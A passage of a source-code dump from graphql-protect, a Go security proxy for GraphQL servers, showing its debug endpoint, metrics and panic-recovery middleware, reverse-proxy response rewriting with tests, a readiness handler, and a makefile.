"Error validating hash [" + v.Hash + "]: " + v.Err.Error() 15 | } 16 | return v.Err.Message 17 | } 18 | 19 | func Wrap(err error) Error { 20 | return Error{ 21 | Err: *gqlerror.Wrap(err), 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /internal/http/debug/debugging.go: -------------------------------------------------------------------------------- 1 | package debug 2 | 3 | import ( 4 | "encoding/json" 5 | "github.com/supportivefe/graphql-protect/internal/business/trusteddocuments" 6 | "net/http" 7 | ) 8 | 9 | func NewTrustedDocumentsDebugger(po *trusteddocuments.Handler, enableDebugEndpoint bool) http.HandlerFunc { 10 | return func(w http.ResponseWriter, _ *http.Request) { 11 | if !enableDebugEndpoint { 12 | w.WriteHeader(http.StatusNotFound) 13 | } else { 14 | trustedDocuments := po.GetTrustedDocuments() 15 | 16 | jsonData, err := json.MarshalIndent(trustedDocuments, "", " ") 17 | if err != nil { 18 | return 19 | } 20 | 21 | w.Header().Set("Content-Type", "application/json") 22 | w.WriteHeader(http.StatusOK) 23 | 24 | _, _ = w.Write(jsonData) 25 | } 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /internal/http/middleware/metrics.go: -------------------------------------------------------------------------------- 1 | package middleware 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "net/http" 6 | "time" 7 | ) 8 | 9 | var ( 10 | httpDuration = prometheus.NewHistogramVec(prometheus.HistogramOpts{ 11 | Namespace: "graphql_protect", 12 | Subsystem: "http", 13 | Name: "duration", 14 | Help: "HTTP duration", 15 | }, 16 | []string{"route"}, 17 | ) 18 | ) 19 | 20 | func init() { 21 | prometheus.MustRegister(httpDuration) 22 | } 23 | 24 | func RequestMetricMiddleware() func(next http.Handler) http.Handler { 25 | return func(next http.Handler) http.Handler { 26 | fn := func(w http.ResponseWriter, r *http.Request) { 27 | start := time.Now() 28 | 29 | next.ServeHTTP(w, r) 30 | 31 | httpDuration.WithLabelValues(r.URL.Path).Observe(time.Since(start).Seconds()) 32 | } 33 | return http.HandlerFunc(fn) 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /internal/http/middleware/recover.go: -------------------------------------------------------------------------------- 1 | package middleware 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "log/slog" 6 | "net/http" 7 | "runtime/debug" 8 | ) 9 | 10 | var recoverCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 11 | Namespace: "graphql_protect", 12 | Subsystem: "recover", 13 | Name: "count", 14 | Help: "Amount of times the middleware recovered a panic", 15 | }, 16 | []string{"error"}, 17 | ) 18 | 19 | func init() { 20 | prometheus.MustRegister(recoverCounter) 21 | } 22 | 23 | func Recover(log *slog.Logger) func(next http.Handler) http.Handler { 24 | return func(next http.Handler) http.Handler { 25 | fn := func(w http.ResponseWriter, r *http.Request) { 26 | defer func() { 27 | err := recover() 28 | // we don't recover http.ErrAbortHandler so the response to the client is aborted, this should not be logged 29 | if err == http.ErrAbortHandler { // nolint:errorlint 30 | panic(err) 31 | } 32 | if err != nil { 33 | recoverCounter.WithLabelValues(getErrNameFromAny(err)).Inc() 34 | log.Error("Panic during handling of request", "error", err, "method", r.Method, "path", r.URL.Path, "stacktrace", string(debug.Stack())) 35 | } 36 | }() 37 | 38 | next.ServeHTTP(w, r) 39 | } 40 | return http.HandlerFunc(fn) 41 | } 42 | } 43 | 44 | func getErrNameFromAny(err any) string { 45 | switch val := err.(type) { 46 | case error: 47 | return val.Error() 48 | default: 49 | return "unknown" 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /internal/http/proxy/proxy.go: -------------------------------------------------------------------------------- 1 | package proxy 2 | 3 | import ( 4 | "bytes" 5 | "encoding/json" 6 | "github.com/supportivefe/graphql-protect/internal/business/rules/block_field_suggestions" 7 | "github.com/supportivefe/graphql-protect/internal/business/rules/obfuscate_upstream_errors" 8 | "io" 9 | "log/slog" 10 | "net/http" 11 | "net/http/httputil" 12 | "net/url" 13 | "strconv" 14 | "time" 15 | ) 16 | 17 | type Config struct { 18 | Timeout time.Duration `yaml:"timeout"` 19 | KeepAlive time.Duration `yaml:"keep_alive"` 20 | Host string `yaml:"host"` 21 | Tracing TracingConfig `yaml:"tracing"` 22 | } 23 | 24 | func DefaultConfig() Config { 25 | return Config{ 26 | Timeout: 10 * time.Second, 27 | KeepAlive: 3 * time.Minute, 28 | Host: "http://localhost:8081", 29 | Tracing: TracingConfig{ 30 | RedactedHeaders: nil, 31 | }, 32 | } 33 | } 34 | 35 | type TracingConfig struct { 36 | RedactedHeaders []string `yaml:"redacted_headers"` 37 | } 38 | 39 | func NewProxy(cfg Config, blockFieldSuggestions *block_field_suggestions.BlockFieldSuggestionsHandler, obfuscateUpstreamErrors *obfuscate_upstream_errors.ObfuscateUpstreamErrors, logGraphqlErrors bool, log *slog.Logger) (*httputil.ReverseProxy, error) { 40 | target, err := url.Parse(cfg.Host) 41 | if err != nil { 42 | return nil, err 43 | } 44 | proxy := &httputil.ReverseProxy{ 45 | Rewrite: func(r *httputil.ProxyRequest) { 46 | r.Out.Header["X-Forwarded-For"] = r.In.Header["X-Forwarded-For"] 47 | r.Out.Header.Del("Accept-Encoding") // Disabled as compression has no direct benefit for us within our cloud setup, this can be removed if proper parsing for all types of compression is implemented 48 | r.SetXForwarded() 49 | r.SetURL(target) 50 | r.Out.Host = r.In.Host 51 | }, 52 | Transport: NewTransport(cfg), 53 | ModifyResponse: modifyResponse(blockFieldSuggestions, obfuscateUpstreamErrors, logGraphqlErrors, log), // nolint:bodyclose 54 | } 55 | 56 | return proxy, nil 57 | } 58 | 59 | func modifyResponse(blockFieldSuggestions *block_field_suggestions.BlockFieldSuggestionsHandler, obfuscateUpstreamErrors *obfuscate_upstream_errors.ObfuscateUpstreamErrors, logGraphqlErrors bool, log *slog.Logger) func(res *http.Response) error { 60 | return func(res *http.Response) error { 61 | 62 | // read raw response bytes 63 | bodyBytes, _ := io.ReadAll(res.Body) 64 | defer res.Body.Close() 65 | 66 | var response map[string]interface{} 67 | err := json.Unmarshal(bodyBytes, &response) 68 | if err != nil { 69 | // if we cannot decode just return 70 | // make sure to set body back to original bytes 71 | res.Body = io.NopCloser(bytes.NewBuffer(bodyBytes)) 72 | return nil 73 | } 74 | 75 | if logGraphqlErrors && response["errors"] != nil { 76 | log.Info("Graphql error", "body", response["errors"]) 77 | } 78 | 79 | if blockFieldSuggestions != nil && blockFieldSuggestions.Enabled() { 80 | response = blockFieldSuggestions.ProcessBody(response) 81 | } 82 | 83 | if obfuscateUpstreamErrors != nil && obfuscateUpstreamErrors.Enabled() { 84 | response = obfuscateUpstreamErrors.ProcessBody(response) 85 | } 86 | 87 | bts, err := json.Marshal(response) 88 | if err != nil { 89 | // if we cannot marshall just return 90 | // make sure to set body back to original bytes 91 | res.Body = io.NopCloser(bytes.NewBuffer(bodyBytes)) 92 | return nil 93 | } 94 | 95 | buffer := bytes.NewBuffer(bts) 96 | res.ContentLength = int64(buffer.Len()) 97 | res.Header.Set("Content-Length", strconv.Itoa(buffer.Len())) 98 | res.Body = io.NopCloser(buffer) 99 | 100 | return nil 101 | } 102 | } 103 | -------------------------------------------------------------------------------- /internal/http/proxy/proxy_test.go: -------------------------------------------------------------------------------- 1 | package proxy 2 | 3 | import ( 4 | "github.com/supportivefe/graphql-protect/internal/business/rules/block_field_suggestions" 5 | "github.com/stretchr/testify/assert" 6 | "io" 7 | "net/http" 8 | "net/http/httptest" 9 | "net/url" 10 | "strings" 11 | "testing" 12 | "time" 13 | ) 14 | 15 | func Test_modifyResponse(t *testing.T) { 16 | type args struct { 17 | blockFieldSuggestions *block_field_suggestions.BlockFieldSuggestionsHandler 18 | response *http.Response 19 | } 20 | tests := []struct { 21 | name string 22 | args args 23 | want func(res *http.Response) 24 | }{ 25 | { 26 | name: "nothing if disabled", 27 | args: args{ 28 | blockFieldSuggestions: func() *block_field_suggestions.BlockFieldSuggestionsHandler { 29 | return block_field_suggestions.NewBlockFieldSuggestionsHandler(block_field_suggestions.Config{ 30 | Enabled: false, 31 | }) 32 | }(), 33 | response: func() *http.Response { 34 | return &http.Response{ 35 | Status: "200", 36 | StatusCode: 200, 37 | Body: io.NopCloser(strings.NewReader("this is not valid json")), 38 | Proto: "HTTP/1.1", 39 | ProtoMajor: 1, 40 | ProtoMinor: 1, 41 | ContentLength: 0, 42 | Header: map[string][]string{}, 43 | } 44 | }(), // nolint:bodyclose 45 | }, 46 | want: func(res *http.Response) { 47 | body, _ := io.ReadAll(res.Body) 48 | assert.Equal(t, 200, res.StatusCode) 49 | assert.Equal(t, "200", res.Status) 50 | assert.Equal(t, "this is not valid json", string(body)) 51 | }, 52 | }, 53 | { 54 | name: "handles non-json gracefully", 55 | args: args{ 56 | blockFieldSuggestions: func() *block_field_suggestions.BlockFieldSuggestionsHandler { 57 | return block_field_suggestions.NewBlockFieldSuggestionsHandler(block_field_suggestions.Config{ 58 | Enabled: true, 59 | }) 60 | }(), 61 | response: func() *http.Response { 62 | return &http.Response{ 63 | Status: "200", 64 | StatusCode: 200, 65 | Body: io.NopCloser(strings.NewReader("this is not valid json")), 66 | Proto: "HTTP/1.1", 67 | ProtoMajor: 1, 68 | ProtoMinor: 1, 69 | ContentLength: 0, 70 | Header: map[string][]string{}, 71 | } 72 | }(), // nolint:bodyclose 73 | }, 74 | want: func(res *http.Response) { 75 | body, _ := io.ReadAll(res.Body) 76 | assert.Equal(t, 200, res.StatusCode) 77 | assert.Equal(t, "200", res.Status) 78 | assert.Equal(t, "this is not valid json", string(body)) 79 | }, 80 | }, 81 | { 82 | name: "handles invalid-json gracefully", 83 | args: args{ 84 | blockFieldSuggestions: func() *block_field_suggestions.BlockFieldSuggestionsHandler { 85 | return block_field_suggestions.NewBlockFieldSuggestionsHandler(block_field_suggestions.Config{ 86 | Enabled: true, 87 | }) 88 | }(), 89 | response: func() *http.Response { // nolint:bodyclose 90 | return &http.Response{ 91 | Status: "200", 92 | StatusCode: 200, 93 | Body: io.NopCloser(strings.NewReader("{ \"this\": \" is not valid json }")), 94 | Proto: "HTTP/1.1", 95 | ProtoMajor: 1, 96 | ProtoMinor: 1, 97 | ContentLength: 0, 98 | Header: map[string][]string{}, 99 | } 100 | }(), // nolint:bodyclose 101 | }, 102 | want: func(res *http.Response) { 103 | body, _ := io.ReadAll(res.Body) 104 | assert.Equal(t, 200, res.StatusCode) 105 | assert.Equal(t, "200", res.Status) 106 | assert.Equal(t, "{ \"this\": \" is not valid json }", string(body)) 107 | }, 108 | }, 109 | { 110 | name: "handles json gracefully", 111 | args: args{ 112 | blockFieldSuggestions: func() *block_field_suggestions.BlockFieldSuggestionsHandler { 113 | return block_field_suggestions.NewBlockFieldSuggestionsHandler(block_field_suggestions.Config{ 114 | Enabled: true, 115 | Mask: "[masked]", 116 | }) 117 | }(), 118 | response: func() *http.Response { 119 | return &http.Response{ 120 | Status: "200", 121 | StatusCode: 200, 122 | Body: io.NopCloser(strings.NewReader("{ \"errors\": [{\"message\": \"Did you mean \"}] }")), 123 | Proto: "HTTP/1.1", 124 | ProtoMajor: 1, 125 | ProtoMinor: 1, 126 | ContentLength: 0, 127 | Header: map[string][]string{}, 128 | } 129 | }(), // nolint:bodyclose 130 | }, 131 | want: func(res *http.Response) { 132 | body, _ := io.ReadAll(res.Body) 133 | assert.Equal(t, 200, res.StatusCode) 134 | assert.Equal(t, "200", res.Status) 135 | assert.Equal(t, "{\"errors\":[{\"message\":\"[masked]\"}]}", string(body)) 136 | }, 137 | }, 138 | } 139 | for _, tt := range tests { 140 | t.Run(tt.name, func(_ *testing.T) { 141 | result := modifyResponse(tt.args.blockFieldSuggestions, nil, false, nil) // nolint:bodyclose 142 | 143 | _ = result(tt.args.response) 144 | tt.want(tt.args.response) 145 | }) 146 | } 147 | } 148 | 149 | func TestForwardsXff(t *testing.T) { 150 | rr := &RequestRecorder{} 151 | testServer := httptest.NewServer(rr) 152 | upstreamURL, err := url.Parse(testServer.URL) 153 | assert.NoError(t, err) 154 | 155 | cfg := Config{ 156 | Timeout: 1 * time.Second, 157 | KeepAlive: 180 * time.Second, 158 | Host: "http://" + upstreamURL.Host, 159 | Tracing: TracingConfig{}, 160 | } 161 | proxy, err := NewProxy(cfg, nil, nil, false, nil) 162 | assert.NoError(t, err) 163 | 164 | req := httptest.NewRequest(http.MethodGet, "/", nil) 165 | req.Header.Set("x-forwarded-for", "123.456.789.0") 166 | 167 | w := httptest.NewRecorder() 168 | 169 | proxy.ServeHTTP(w, req) 170 | 171 | rr.Assert(func(r *http.Request) { 172 | val := r.Header.Get("x-forwarded-for") 173 | assert.True(t, strings.HasPrefix(val, "123.456.789.0,")) // trailing , to make sure IP of protect is appended to list 174 | }) 175 | } 176 | 177 | type RequestRecorder struct { 178 | lastRequest *http.Request 179 | } 180 | 181 | func (r *RequestRecorder) ServeHTTP(_ http.ResponseWriter, request *http.Request) { 182 | r.lastRequest = request 183 | } 184 | 185 | func (r *RequestRecorder) Assert(assert func(r *http.Request)) { 186 | assert(r.lastRequest) 187 | } 188 | -------------------------------------------------------------------------------- /internal/http/proxy/transport.go: -------------------------------------------------------------------------------- 1 | package proxy 2 | 3 | import ( 4 | "context" 5 | "go.opentelemetry.io/contrib/instrumentation/net/http/httptrace/otelhttptrace" 6 | "go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp" 7 | "net" 8 | "net/http" 9 | "net/http/httptrace" 10 | ) 11 | 12 | func NewTransport(cfg Config) http.RoundTripper { 13 | return otelhttp.NewTransport( 14 | &http.Transport{ 15 | Proxy: http.ProxyFromEnvironment, 16 | DialContext: (&net.Dialer{ 17 | Timeout: cfg.Timeout, 18 | KeepAlive: cfg.KeepAlive, 19 | }).DialContext, 20 | }, 21 | otelhttp.WithSpanNameFormatter(spanNameFormatter), 22 | otelhttp.WithClientTrace(newClientTrace(cfg.Tracing))) 23 | } 24 | 25 | func spanNameFormatter(_ string, _ *http.Request) string { 26 | return "Proxy to target GraphQL Server" 27 | } 28 | 29 | func newClientTrace(conf TracingConfig) func(ctx context.Context) *httptrace.ClientTrace { 30 | return func(ctx context.Context) *httptrace.ClientTrace { 31 | return otelhttptrace.NewClientTrace(ctx, otelhttptrace.WithRedactedHeaders(conf.RedactedHeaders...)) 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /internal/http/readiness/readiness.go: -------------------------------------------------------------------------------- 1 | package readiness 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | ) 7 | 8 | func NewReadinessHandler() http.HandlerFunc { 9 | return func(w http.ResponseWriter, _ *http.Request) { 10 | w.WriteHeader(http.StatusOK) 11 | _, _ = fmt.Fprintf(w, "I'm ready!") 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /internal/http/readiness/readiness_test.go: -------------------------------------------------------------------------------- 1 | package readiness 2 | 3 | import ( 4 | "github.com/stretchr/testify/assert" 5 | "io" 6 | "net/http" 7 | "net/http/httptest" 8 | "testing" 9 | ) 10 | 11 | func TestNewReadinessHandler(t *testing.T) { 12 | tests := []struct { 13 | name string 14 | want func(t *testing.T, res *http.Response) 15 | }{ 16 | { 17 | name: "Sends a 200 status code with an \"I'm ready!\" body", 18 | want: func(t *testing.T, res *http.Response) { 19 | assert.Equal(t, http.StatusOK, res.StatusCode) 20 | payload, _ := io.ReadAll(res.Body) 21 | assert.Equal(t, "I'm ready!", string(payload)) 22 | }, 23 | }, 24 | } 25 | for _, tt := range tests { 26 | t.Run(tt.name, func(t *testing.T) { 27 | req := httptest.NewRequest("GET", "/", nil) 28 | 29 | handler := NewReadinessHandler() 30 | resp := httptest.NewRecorder() 31 | 32 | handler.ServeHTTP(resp, req) 33 | 34 | res := resp.Result() 35 | defer res.Body.Close() 36 | 37 | tt.want(t, res) 38 | }) 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /makefile: -------------------------------------------------------------------------------- 1 | 2 | SHORT_HASH = $(shell git rev-parse --short HEAD) 3 | BUILD_DATE = $(shell date -u +'%Y-%m-%dT%H:%M:%SZ') 4 | VERSION = develop 5 | 6 | META_PKG = main 7 | LDFLAGS += -X '$(META_PKG).shortHash=$(SHORT_HASH)' 8 | LDFLAGS += -X '$(META_PKG).build=$(VERSION)' 9 | LDFLAGS += -s -w 10 | 11 | .PHONY: dev.setup 12 | dev.setup: 13 | go mod tidy 14 | go install github.com/golangci/golangci-lint/cmd/golangci-lint@v1.60.1 15 | 16 | .PHONY: build 17 | build: 18 | CGO_ENABLED=0 go build -ldflags "$(LDFLAGS)" -o graphql-protect ./cmd/. 19 | 20 | x-build: 21 | GOOS=linux GOARCH=amd64 make build 22 | 23 | .PHONY: test 24 | test: 25 | go test -v ./... 26 | 27 | .PHONY: lint 28 | ## Runs a linter over the code 29 | lint: 30 | golangci-lint run --timeout 3m 31 | 32 | .PHONY: build_container 33 | build_container: build 34 | docker build . -t graphql-protect --build-arg BUILD_DATE=$(BUILD_DATE) --build-arg VERSION=$(VERSION) --build-arg REVISION=$(SHORT_HASH) 35 | 36 | x_build_container: x-build 37 | docker buildx build --platform="linux/amd64" -t graphql-protect --build-arg BUILD_DATE=$(BUILD_DATE) --build-arg VERSION=$(VERSION) --build-arg REVISION=$(SHORT_HASH) . 38 | 39 | .PHONY: run_container 40 | run_container: build_container 41 | docker run -itd --rm -p 8080:8080 graphql-protect --------------------------------------------------------------------------------